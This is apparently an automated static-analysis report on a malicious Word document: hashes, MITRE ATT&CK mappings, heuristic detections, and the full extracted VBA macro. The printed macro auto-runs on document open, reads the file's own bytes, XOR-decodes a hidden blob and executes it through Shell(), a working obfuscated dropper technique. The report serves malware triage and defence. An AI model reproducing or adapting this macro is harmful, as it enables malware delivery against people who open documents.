Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 133235471d6a3e35…

MALICIOUS

Office (OLE)

87.5 KB Created: 2017-08-24 09:40:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: 7b713f3cae6b0597e74be219e215d09f SHA-1: 58ff099d44a6ef1978249782d4d3d5e4696612d2 SHA-256: 133235471d6a3e351c3e4ec92d42af24a4bfdd66ea696338c265953331ac6a26
264 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA code, and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' confirms this auto-executes via Workbook_Open. This suggests the macro is designed to download and execute a second-stage payload, a common technique for malware delivery. The ClamAV detection further supports its malicious nature.

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-7474871-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7474871-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3997 bytes
SHA-256: d109bc00d7d1269e719960ef3c71344f11004c8e205a0e1a0ee35952245b43cc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
    Private Declare PtrSafe Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
    Private Declare PtrSafe Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
    Private Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
#Else
    Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
    Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
    Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
#End If

Public Sub kAqnPBIjzTPDrCBgyQ()
    Dim fzjHPHAplebeCXOHQeoeI() As Byte

    fzjHPHAplebeCXOHQeoeI = qjyIrqWDdBxQoOy(ActiveDocument.FullName)
    Dim QFexzTvfVitQPcaTAGolwfxOnF As String
    QFexzTvfVitQPcaTAGolwfxOnF = StrConv(fzjHPHAplebeCXOHQeoeI, 64)
    
    Dim UKcjLZlJEDrhGUgjTL
    UKcjLZlJEDrhGUgjTL = Split(QFexzTvfVitQPcaTAGolwfxOnF, "CGOxUKUPIdGUIoNOOQKelQUeMaGIAsEwjPaRZjoKnOQCEqYFialbrILMMKKTdmpqzkLSoVOEBZRxZrAvcbAzhDfAdnfpyvGbyAduFfrmlGzrRoMujpQcLQiWekPaQygftPYzogQXKnnAdOIPBKgjEEpIrgquqqwNzuXbqmfdyTrxCISpBayfsXAOAqihQvHtRA")
    Dim iMGWDIPwxKipkUqAuTYHRDs As String
    Dim ujhfhOEmIwAmGuxKoPua As String
    Dim blsXDG As String
    ujhfhOEmIwAmGuxKoPua = StrConv(StrConv(UKcjLZlJEDrhGUgjTL(UBound(UKcjLZlJEDrhGUgjTL)), 64), 128)
    blsXDG = Mid$(ujhfhOEmIwAmGuxKoPua, 3, Len(ujhfhOEmIwAmGuxKoPua))
    
    iMGWDIPwxKipkUqAuTYHRDs = YHTwdherPxHkRbyQOhgVx("JQHzoFcKLn", blsXDG)
    
    fEbjGsOgdcnBcTbdKnv iMGWDIPwxKipkUqAuTYHRDs, 0
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Private Sub fEbjGsOgdcnBcTbdKnv(ByVal xIkvAPOfmQuLAJyc As String, _
    ByVal fdcCtmrCbHgWtkuyFfxtFIQ As VbAppWinStyle)
    
    Dim JTnHBbsvZqFjtVdvTSz As Long
    Dim HjTFanUD As Long

    On Error GoTo zYJbZoLXdFkfKbbAMjIWAaIHoh
    JTnHBbsvZqFjtVdvTSz = Shell(xIkvAPOfmQuLAJyc, fdcCtmrCbHgWtkuyFfxtFIQ)
    On Error GoTo 0

    DoEvents

    HjTFanUD = OpenProcess(&H100000, 0, JTnHBbsvZqFjtVdvTSz)
    If HjTFanUD <> 0 Then
        WaitForSingleObject HjTFanUD, &HFFFFFFFF
        CloseHandle HjTFanUD
    End If

    Exit Sub

zYJbZoLXdFkfKbbAMjIWAaIHoh:
    MsgBox "Error starting task " & _
        vbCrLf & _
        Err.Description, vbOKOnly Or vbExclamation, _
        "Error"
End Sub
Public Function YHTwdherPxHkRbyQOhgVx(FOZkEsXOhDiVna As String, eiypfVRhkibDvDQxKlE As String) As String
    Dim exTDLt As Long
    Dim pebVN As String
    Dim nKZHFryNHObDPCkr As Integer, pXCHjw As Integer, a As Long

    For exTDLt = 1 To Len(eiypfVRhkibDvDQxKlE)
        a = exTDLt Mod Len(FOZkEsXOhDiVna)
        If a = 0 Then a = Len(FOZkEsXOhDiVna)
        
        nKZHFryNHObDPCkr = Asc(Mid$(eiypfVRhkibDvDQxKlE, exTDLt, 1))
        pXCHjw = Asc(Mid$(FOZkEsXOhDiVna, a, 1))
        pebVN = pebVN + Chr(nKZHFryNHObDPCkr Xor pXCHjw)
    Next exTDLt
    
   YHTwdherPxHkRbyQOhgVx = pebVN
End Function

Public Sub Document_Open()
    kAqnPBIjzTPDrCBgyQ
End Sub

Public Function qjyIrqWDdBxQoOy(ByVal WCOYvnhnptMqUeTEtk As String) As Byte()
    Dim ujhfhOEmIwAmGuxKoPua As Long
    Dim blsXDG() As Byte
    ujhfhOEmIwAmGuxKoPua = FreeFile
        Open WCOYvnhnptMqUeTEtk For Binary Access Read As ujhfhOEmIwAmGuxKoPua
        ReDim blsXDG(LOF(ujhfhOEmIwAmGuxKoPua) - 1&) As Byte
        Get ujhfhOEmIwAmGuxKoPua, , blsXDG
        Close ujhfhOEmIwAmGuxKoPua
    qjyIrqWDdBxQoOy = blsXDG
End Function